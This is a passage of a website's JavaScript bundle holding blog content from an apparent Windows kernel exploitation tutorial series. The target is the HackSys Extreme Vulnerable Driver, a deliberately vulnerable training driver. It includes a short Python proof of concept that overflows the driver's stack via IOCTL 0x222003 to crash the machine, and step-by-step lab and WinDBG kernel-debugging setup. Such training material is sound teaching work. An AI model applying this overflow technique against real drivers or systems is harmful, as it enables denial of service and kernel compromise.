512w,https://framerusercontent.com/images/inoGYdFMRm0NQGlleIwBg1qXqw.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/inoGYdFMRm0NQGlleIwBg1qXqw.png 1920w\",style:{aspectRatio:\"1920 / 272\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Great, it means that if we wanted to overflow the \",/*#__PURE__*/e(\"code\",{children:\"KernelBuffer\"}),\" variable, we should inject a payload with more than 2048 bytes, using the \",/*#__PURE__*/e(\"code\",{children:\"IOCTL\"}),\" code \",/*#__PURE__*/e(\"code\",{children:\"0x222003\"}),\". Let\u2019s create our exploit:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:'#!/usr/bin/env python3\\n\"\"\"\\nHackSysExtremeVulnerableDrive Stack Overflow DoS.\\n\\nVulnerable Software: HackSysExtremeVulnerableDrive\\nVersion: 3.00\\nExploit Author: Andres Roldan\\nTested On: Windows 10 1703\\nWriteup: https://fluidattacks.com/blog/hevd-dos/\\n\"\"\"\\n\\nfrom infi.wioctl import DeviceIoControl\\n\\nDEVICE_NAME = r\\'\\\\\\\\.\\\\HackSysExtremeVulnerableDriver\\'\\n\\nIOCTL_HEVD_STACK_OVERFLOW = 0x222003\\nSIZE = 3000\\n\\nPAYLOAD = (\\n    b\\'A\\' * SIZE\\n)\\n\\nHANDLE = DeviceIoControl(DEVICE_NAME)\\nHANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)',language:\"Python\"})})}),/*#__PURE__*/e(\"p\",{children:\"And check it:\"}),/*#__PURE__*/e(\"img\",{alt:\"Success\",className:\"framer-image\",height:\"662\",src:\"https://framerusercontent.com/images/zIECSVkqVvlXgpdk2pWGVLQHMs.gif\",srcSet:\"https://framerusercontent.com/images/zIECSVkqVvlXgpdk2pWGVLQHMs.gif?scale-down-to=1024 863w,https://framerusercontent.com/images/zIECSVkqVvlXgpdk2pWGVLQHMs.gif 1116w\",style:{aspectRatio:\"1116 / 1324\"},width:\"558\"}),/*#__PURE__*/t(\"p\",{children:[\"Great! We were able to overwrite \",/*#__PURE__*/e(\"code\",{children:\"EIP\"}),\" with our \",/*#__PURE__*/e(\"code\",{children:\"A\"}),\" buffer! Now the target machine is completely unusable and our \",/*#__PURE__*/e(\"code\",{children:\"DoS\"}),\" attack was successful.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Also, as we could evidence in our previous exploitation posts, we control the execution flow when we control \",/*#__PURE__*/e(\"code\",{children:\"EIP\"}),\".\"]}),/*#__PURE__*/e(\"h2\",{children:\"Conclusions\"}),/*#__PURE__*/t(\"p\",{children:[\"This post was intended to cover the first part for interacting with a Windows driver, and we were able to perform a full Denial of Service of the victim machine. In the next post, we will use the proven ability to control the execution flow to \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/hevd-smep-bypass/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"execute code at kernel-level\"})}),\".\"]})]});export const richText5=/*#__PURE__*/t(i.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[\"This post will be the first of a new series in which we will get deep into Windows Kernel Exploitation. I\u2019ll be using \",/*#__PURE__*/e(r,{href:\"https://github.com/hacksysteam/HackSysExtremeVulnerableDriver\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"HEVD\"})}),\" (HackSys Extreme Vulnerable Driver) as the target and, just as we did with the Vulnserver series, there\u2019s going to be a different articles on the ways to exploit it.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Before dealing with vulnerabilities, we must setup the lab environment first. Kernel exploiting is different than application exploiting. When you are attacking an application, if something goes wrong, you can simply restart it. In kernel mode, you will likely get an infamous blue screen of death \",/*#__PURE__*/e(\"code\",{children:\"BSOD\"}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"This post will guide you to setup a testing lab for kernel debugging on a Windows 10 target machine and finally we will be able to install \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" driver that will be our kernel space victim.\"]})]});export const richText6=/*#__PURE__*/t(i.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"Pre-requisites\"}),/*#__PURE__*/e(\"p\",{children:\"Unlike common user-land applications, the Windows Kernel is commonly debugged remotely. This is because, as I mentioned earlier, when you mess with kernel memory, you\u2019re likely making the OS unusable. For that, we will setup a testing environment with a target Windows OS system (the debuggee) and some tools in the debugger machine.\"}),/*#__PURE__*/e(\"p\",{children:\"The following are the tools needed to setup the environment:\"}),/*#__PURE__*/t(\"ul\",{style:{\"--framer-text-alignment\":\"start\",\"--framer-text-color\":\"rgb(0, 0, 0)\",\"--framer-text-stroke-width\":\"0px\",\"--framer-text-transform\":\"none\"},children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"WinDBG. We\u2019ll use the version that\u2019s included in the \",/*#__PURE__*/e(r,{href:\"https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"Windows 10 SDK\"})})]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"WinDBG dark theme (optional): Because I like \",/*#__PURE__*/e(r,{href:\"https://github.com/lololosys/windbg-theme\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"fancy debugging\"})})]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"Pykd: To run Python scripts on WinDBG. Download \",/*#__PURE__*/e(r,{href:\"https://githomelab.ru/pykd/pykd\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"here\"})}),\".\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"Windbglib + Mona: Download \",/*#__PURE__*/e(r,{href:\"https://github.com/corelan/windbglib\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"here\"})})]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"Windows 10 1703 (Creators Update): For now, we\u2019d only need the 32 bits \",/*#__PURE__*/e(r,{href:\"https://www.getmyos.com/windows-10-1703-home-pro-education-32-64-bit-free-download\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"version\"})})]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/e(\"p\",{children:\"A virtual machine player. I\u2019ll be using VMWare Workstation Player.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"HackSys Extreme Vulnerable Driver: Our \",/*#__PURE__*/e(r,{href:\"https://github.com/hacksysteam/HackSysExtremeVulnerableDriver\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"target\"})}),\". We\u2019ll be using the latest stable release (\",/*#__PURE__*/e(\"code\",{children:\"HEVD v3.00\"}),\" to the date of this post).\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"OSR Driver Loader: To load \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" into the OS. Download \",/*#__PURE__*/e(r,{href:\"https://www.osronline.com/article.cfm%5earticle=157.htm\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"here\"})})]})})]}),/*#__PURE__*/t(\"p\",{children:[\"With all the requirements in place, we can start setting up our lab, which will be composed of a debugger machine, that will be the host machine from which we will run \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\"; and the debuggee machine, on which we will install \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" that will be running as a virtual machine.\"]}),/*#__PURE__*/e(\"h2\",{children:\"Setting up debugger\"}),/*#__PURE__*/t(\"p\",{children:[\"The first stage is to download and install the Windows 10 SDK. If you want to install only WinDBG, you can choose only the \",/*#__PURE__*/e(\"code\",{children:\"Debugging Tools for Windows\"}),\" option:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Install Windows 10 SDK\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/AUw5XubxUwutAFkHpIzBcz3nRuQ.png\",srcSet:\"https://framerusercontent.com/images/AUw5XubxUwutAFkHpIzBcz3nRuQ.png?scale-down-to=512 512w,https://framerusercontent.com/images/AUw5XubxUwutAFkHpIzBcz3nRuQ.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/AUw5XubxUwutAFkHpIzBcz3nRuQ.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Once installed, if you search for \",/*#__PURE__*/e(\"code\",{children:\"windbg\"}),\" on Windows, you should get something like this:\"]}),/*#__PURE__*/e(\"img\",{alt:\"windbg on Windows\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/ACsnnLlRRRKJ9Ita1R6AgFn1xk4.png\",srcSet:\"https://framerusercontent.com/images/ACsnnLlRRRKJ9Ita1R6AgFn1xk4.png?scale-down-to=512 512w,https://framerusercontent.com/images/ACsnnLlRRRKJ9Ita1R6AgFn1xk4.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/ACsnnLlRRRKJ9Ita1R6AgFn1xk4.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"The default \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\" configuration provides a not so friendly UI. However we can use a dark theme for \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\" (see the Pre-Requisites section). To do that, just download the \",/*#__PURE__*/e(\"code\",{children:\"dark.reg\"}),\" file and install it. You will get a much friendly UI:\"]}),/*#__PURE__*/e(\"img\",{alt:\"windbg dark.reg\",className:\"framer-image\",height:\"515\",src:\"https://framerusercontent.com/images/lsEyG9ikJZqkRihraBDYxL8RBfY.png\",srcSet:\"https://framerusercontent.com/images/lsEyG9ikJZqkRihraBDYxL8RBfY.png?scale-down-to=512 512w,https://framerusercontent.com/images/lsEyG9ikJZqkRihraBDYxL8RBfY.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/lsEyG9ikJZqkRihraBDYxL8RBfY.png 1920w\",style:{aspectRatio:\"1920 / 1030\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Next, we need to adjust the Windows symbols resolution. It is done by creating a new environment variable \",/*#__PURE__*/e(\"code\",{children:\"_NT_SYMBOL_PATH\"}),\" with the value \",/*#__PURE__*/e(\"code\",{children:\"srv*https://msdl.microsoft.com/download/symbols\"}),\", like this:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Environment variables\",className:\"framer-image\",height:\"363\",src:\"https://framerusercontent.com/images/QwJQHS4rJQjNoK0Ftu5XaxqCmE.png\",srcSet:\"https://framerusercontent.com/images/QwJQHS4rJQjNoK0Ftu5XaxqCmE.png?scale-down-to=512 512w,https://framerusercontent.com/images/QwJQHS4rJQjNoK0Ftu5XaxqCmE.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/QwJQHS4rJQjNoK0Ftu5XaxqCmE.png 1920w\",style:{aspectRatio:\"1920 / 726\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Now, we need to install our friend \",/*#__PURE__*/e(\"code\",{children:\"mona\"}),\". To do that, we need to grab the \",/*#__PURE__*/e(\"code\",{children:\"pykd.zip\"}),\" file located \",/*#__PURE__*/e(r,{href:\"https://github.com/corelan/windbglib/tree/master/pykd\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"here\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"That ZIP has two files. The \",/*#__PURE__*/e(\"code\",{children:\"pykd.pyd\"}),\" file should be placed at \",/*#__PURE__*/e(\"code\",{children:\"C:\\\\Program Files (x86)\\\\Windows Kits\\\\10\\\\Debuggers\\\\x86\\\\winext\"}),\". Now run \",/*#__PURE__*/e(\"code\",{children:\"vcredist_x86.exe\"}),\" and follow the installing instructions.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Now, all that\u2019s left is to download \",/*#__PURE__*/e(\"code\",{children:\"windbglib.py\"}),\" from \",/*#__PURE__*/e(r,{href:\"https://github.com/corelan/windbglib/raw/master/windbglib.py\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"here\"})}),\" and \",/*#__PURE__*/e(\"code\",{children:\"mona.py\"}),\" from \",/*#__PURE__*/e(r,{href:\"https://github.com/corelan/mona/raw/master/mona.py\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"here\"})}),\" and move them to \",/*#__PURE__*/e(\"code\",{children:\"C:\\\\Program Files (x86)\\\\Windows Kits\\\\10\\\\Debuggers\\\\x86\"}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"To check if that worked, load an executable on \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\", type \",/*#__PURE__*/e(\"code\",{children:\".load pykd.pyd\"}),\" and then \",/*#__PURE__*/e(\"code\",{children:\"!py mona\"}),\". You should see something like this:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Loading an executable on WinDBG\",className:\"framer-image\",height:\"538\",src:\"https://framerusercontent.com/images/CkykoYrXIduVvjRvYRinTAuPG0.gif\",srcSet:\"https://framerusercontent.com/images/CkykoYrXIduVvjRvYRinTAuPG0.gif?scale-down-to=512 512w,https://framerusercontent.com/images/CkykoYrXIduVvjRvYRinTAuPG0.gif?scale-down-to=1024 1024w,https://framerusercontent.com/images/CkykoYrXIduVvjRvYRinTAuPG0.gif 1650w\",style:{aspectRatio:\"1650 / 1076\"},width:\"825\"}),/*#__PURE__*/e(\"p\",{children:\"With that, we have now debugger machine set.\"}),/*#__PURE__*/e(\"h2\",{children:\"Setting up the debuggee\"}),/*#__PURE__*/e(\"p\",{children:\"Now it\u2019s time to setup our target OS. The first thing is to launch a new virtual machine with a Windows 10 1703 (Creators Update) instance.\"}),/*#__PURE__*/e(\"p\",{children:\"It\u2019s recommended to disable Windows Update service to avoid messing with our lab results.\"}),/*#__PURE__*/t(\"p\",{children:[\"With the target machine up an running, it\u2019s time to load \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" in the system. This is done by copying the \",/*#__PURE__*/e(\"code\",{children:\"osrloaderv30.zip\"}),\" and \",/*#__PURE__*/e(\"code\",{children:\"HEVD.3.00.zip\"}),\" files to this target OS and uncompressed them. Then, we must run \",/*#__PURE__*/e(\"code\",{children:\"OSR Driver Loader\"}),\" (run the one in the \",/*#__PURE__*/e(\"code\",{children:\"WNET \u2192 i386 \u2192 FRE\"}),\" folder):\"]}),/*#__PURE__*/e(\"img\",{alt:\"OSR Driver Loader\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/8vT8I0ijShxe20JPljsBOEshGg.png\",srcSet:\"https://framerusercontent.com/images/8vT8I0ijShxe20JPljsBOEshGg.png?scale-down-to=512 512w,https://framerusercontent.com/images/8vT8I0ijShxe20JPljsBOEshGg.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/8vT8I0ijShxe20JPljsBOEshGg.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Now browse for the \",/*#__PURE__*/e(\"code\",{children:\"HEVD.sys\"}),\" file, click on \",/*#__PURE__*/e(\"code\",{children:\"Register Service\"}),\" and then \",/*#__PURE__*/e(\"code\",{children:\"Start Service\"}),\":\"]}),/*#__PURE__*/e(\"img\",{alt:\"OSR Driver Loader gif\",className:\"framer-image\",height:\"394\",src:\"https://framerusercontent.com/images/PRSCqHgY9h8UnYADk0IxXYCIuc.gif\",srcSet:\"https://framerusercontent.com/images/PRSCqHgY9h8UnYADk0IxXYCIuc.gif?scale-down-to=512 512w,https://framerusercontent.com/images/PRSCqHgY9h8UnYADk0IxXYCIuc.gif?scale-down-to=1024 1024w,https://framerusercontent.com/images/PRSCqHgY9h8UnYADk0IxXYCIuc.gif 1038w\",style:{aspectRatio:\"1038 / 788\"},width:\"519\"}),/*#__PURE__*/t(\"p\",{children:[\"To check if that went well, open a terminal and type \",/*#__PURE__*/e(\"code\",{children:\"driverquery | findstr HEVD\"}),\". You should see something like this:\"]}),/*#__PURE__*/e(\"img\",{alt:\"driverquery | findstr HEVD\",className:\"framer-image\",height:\"312\",src:\"https://framerusercontent.com/images/blVHZnktwBFdD6dyuVYbpju8sy4.png\",srcSet:\"https://framerusercontent.com/images/blVHZnktwBFdD6dyuVYbpju8sy4.png?scale-down-to=512 512w,https://framerusercontent.com/images/blVHZnktwBFdD6dyuVYbpju8sy4.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/blVHZnktwBFdD6dyuVYbpju8sy4.png 1920w\",style:{aspectRatio:\"1920 / 624\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Great! To ensure that the \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" driver is load every time, open a terminal as administrator and run\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"> sc config HEVD start=system\",language:\"Markdown\"})})}),/*#__PURE__*/e(\"img\",{alt:\"Administrator command prompt\",className:\"framer-image\",height:\"235\",src:\"https://framerusercontent.com/images/VaDWRRJweqrpGy0y5trdFKOsFes.png\",srcSet:\"https://framerusercontent.com/images/VaDWRRJweqrpGy0y5trdFKOsFes.png?scale-down-to=512 512w,https://framerusercontent.com/images/VaDWRRJweqrpGy0y5trdFKOsFes.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/VaDWRRJweqrpGy0y5trdFKOsFes.png 1920w\",style:{aspectRatio:\"1920 / 470\"},width:\"960\"}),/*#__PURE__*/e(\"p\",{children:\"Now we must connect our target OS with the debugger. You need to launch a new terminal windows as administrator:\"}),/*#__PURE__*/e(\"img\",{alt:\"Terminal window as administrator\",className:\"framer-image\",height:\"395\",src:\"https://framerusercontent.com/images/7rb1iYcD0CB4ZvI3ByTFn4kkWnQ.gif\",srcSet:\"https://framerusercontent.com/images/7rb1iYcD0CB4ZvI3ByTFn4kkWnQ.gif?scale-down-to=512 512w,https://framerusercontent.com/images/7rb1iYcD0CB4ZvI3ByTFn4kkWnQ.gif?scale-down-to=1024 1024w,https://framerusercontent.com/images/7rb1iYcD0CB4ZvI3ByTFn4kkWnQ.gif 1034w\",style:{aspectRatio:\"1034 / 790\"},width:\"517\"}),/*#__PURE__*/e(\"p\",{children:\"And then you need to enable remote debugging by issuing the following command:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"> bcdedit /dbgsettings NET HOSTIP:192.168.20.31 PORT:50000\",language:\"Markdown\"})})}),/*#__PURE__*/t(\"p\",{children:[\"You need to change the \",/*#__PURE__*/e(\"code\",{children:\"HOSTIP\"}),\" param with the IP of the debugger machine.\"]}),/*#__PURE__*/t(\"p\",{children:[\"This will return a key that will be used for \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\" to expect for a connection with that identifier.\"]}),/*#__PURE__*/e(\"img\",{alt:\"Return of a key\",className:\"framer-image\",height:\"395\",src:\"https://framerusercontent.com/images/mSClhnBJE4ExcDs2fx5WOprGLeQ.gif\",srcSet:\"https://framerusercontent.com/images/mSClhnBJE4ExcDs2fx5WOprGLeQ.gif?scale-down-to=512 512w,https://framerusercontent.com/images/mSClhnBJE4ExcDs2fx5WOprGLeQ.gif?scale-down-to=1024 1024w,https://framerusercontent.com/images/mSClhnBJE4ExcDs2fx5WOprGLeQ.gif 1034w\",style:{aspectRatio:\"1034 / 790\"},width:\"517\"}),/*#__PURE__*/t(\"p\",{children:[\"In the debugger machine, setup \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\" to listen for a connection with that key:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Setup WinDBG\",className:\"framer-image\",height:\"518\",src:\"https://framerusercontent.com/images/n4uS6Dg9cKQqGhwsSPeIsLfauE.gif\",srcSet:\"https://framerusercontent.com/images/n4uS6Dg9cKQqGhwsSPeIsLfauE.gif?scale-down-to=512 512w,https://framerusercontent.com/images/n4uS6Dg9cKQqGhwsSPeIsLfauE.gif?scale-down-to=1024 1024w,https://framerusercontent.com/images/n4uS6Dg9cKQqGhwsSPeIsLfauE.gif 1065w\",style:{aspectRatio:\"1065 / 1036\"},width:\"532\"}),/*#__PURE__*/t(\"p\",{children:[\"Now, we need to make Windows to start in \",/*#__PURE__*/e(\"code\",{children:\"DEBUG\"}),\" mode and restart. To that, we should issue the following command:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"> bcdedit /debug ON\\n> shutdown -r -t 0\",language:\"Markdown\"})})}),/*#__PURE__*/e(\"p\",{children:\"The target OS will restart and the debugger machine should now get a connection from the target OS:\"}),/*#__PURE__*/e(\"img\",{alt:\"Debugger getting connection\",className:\"framer-image\",height:\"610\",src:\"https://framerusercontent.com/images/tNBsk0jWog0aEZA24sSt9IX28kU.gif\",srcSet:\"https://framerusercontent.com/images/tNBsk0jWog0aEZA24sSt9IX28kU.gif?scale-down-to=1024 907w,https://framerusercontent.com/images/tNBsk0jWog0aEZA24sSt9IX28kU.gif 1082w\",style:{aspectRatio:\"1082 / 1221\"},width:\"541\"}),/*#__PURE__*/t(\"p\",{children:[\"Great. Now break the execution (\",/*#__PURE__*/e(\"code\",{children:\"Debug \u2192 Break\"}),\") and type \",/*#__PURE__*/e(\"code\",{children:\".reload\"}),\" to load the debugging symbols:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Loading debugging symbols\",className:\"framer-image\",height:\"454\",src:\"https://framerusercontent.com/images/bzRV9zBhwYnTMvzejOZEd2fefEA.png\",srcSet:\"https://framerusercontent.com/images/bzRV9zBhwYnTMvzejOZEd2fefEA.png?scale-down-to=512 512w,https://framerusercontent.com/images/bzRV9zBhwYnTMvzejOZEd2fefEA.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/bzRV9zBhwYnTMvzejOZEd2fefEA.png 1920w\",style:{aspectRatio:\"1920 / 909\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"To check if everything\u2019s working, type \",/*#__PURE__*/t(\"code\",{children:[\"x /f nt!\",/*#__PURE__*/e(\"strong\",{children:\"Create*Process\"})]}),\". This will list all the functions in the \",/*#__PURE__*/e(\"code\",{children:\"NT\"}),\" module that contain \",/*#__PURE__*/e(\"code\",{children:\"Create\"}),\" and \",/*#__PURE__*/e(\"code\",{children:\"Process\"}),\".\"]}),/*#__PURE__*/e(\"img\",{alt:\"type x /f nt!Create*Process\",className:\"framer-image\",height:\"456\",src:\"https://framerusercontent.com/images/qIAhsi7ZsdAyVvxmeIIiOG6pok.png\",srcSet:\"https://framerusercontent.com/images/qIAhsi7ZsdAyVvxmeIIiOG6pok.png?scale-down-to=512 512w,https://framerusercontent.com/images/qIAhsi7ZsdAyVvxmeIIiOG6pok.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/qIAhsi7ZsdAyVvxmeIIiOG6pok.png 1920w\",style:{aspectRatio:\"1920 / 913\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Now, set a breakpoint in \",/*#__PURE__*/e(\"code\",{children:\"nt!MmCreateProcessAddressSpace\"}),\" and resume execution:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Setting a breakpoint\",className:\"framer-image\",height:\"456\",src:\"https://framerusercontent.com/images/C8mucUQ7DEHMI7CZIizQO0lNwI.png\",srcSet:\"https://framerusercontent.com/images/C8mucUQ7DEHMI7CZIizQO0lNwI.png?scale-down-to=512 512w,https://framerusercontent.com/images/C8mucUQ7DEHMI7CZIizQO0lNwI.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/C8mucUQ7DEHMI7CZIizQO0lNwI.png 1920w\",style:{aspectRatio:\"1920 / 912\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Great! But as we are going to debug \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\", we must add the debugging symbols to our environment. If you look at the folder \",/*#__PURE__*/e(\"code\",{children:\"HEVD.3.00\\\\driver\\\\vulnerable\\\\x86\"}),\" you can see several files, including the \",/*#__PURE__*/e(\"code\",{children:\"HEVD.sys\"}),\" driver file and \",/*#__PURE__*/e(\"code\",{children:\"HEVD.pdb\"}),\". The latter is the file containing the \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" debugging symbols. To load it on our debugger, follow these steps:\"]}),/*#__PURE__*/t(\"ul\",{style:{\"--framer-text-alignment\":\"start\",\"--framer-text-color\":\"rgb(0, 0, 0)\",\"--framer-text-stroke-width\":\"0px\",\"--framer-text-transform\":\"none\"},children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"Create a folder called \",/*#__PURE__*/e(\"code\",{children:\"C:\\\\projects\\\\hevd\\\\build\\\\driver\\\\vulnerable\\\\x86\\\\HEVD\"})]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"Copy the \",/*#__PURE__*/e(\"code\",{children:\"HEVD.pdb\"}),\" file in that directory.\"]})})]}),/*#__PURE__*/e(\"img\",{alt:\"Loading it on our debugger\",className:\"framer-image\",height:\"315\",src:\"https://framerusercontent.com/images/kPO7nw96heOFWse7159o1PBc4.png\",srcSet:\"https://framerusercontent.com/images/kPO7nw96heOFWse7159o1PBc4.png?scale-down-to=512 512w,https://framerusercontent.com/images/kPO7nw96heOFWse7159o1PBc4.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/kPO7nw96heOFWse7159o1PBc4.png 1920w\",style:{aspectRatio:\"1920 / 631\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"On \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\", type \",/*#__PURE__*/e(\"code\",{children:\".reload\"})]}),/*#__PURE__*/t(\"ul\",{style:{\"--framer-text-alignment\":\"start\",\"--framer-text-color\":\"rgb(0, 0, 0)\",\"--framer-text-stroke-width\":\"0px\",\"--framer-text-transform\":\"none\"},children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 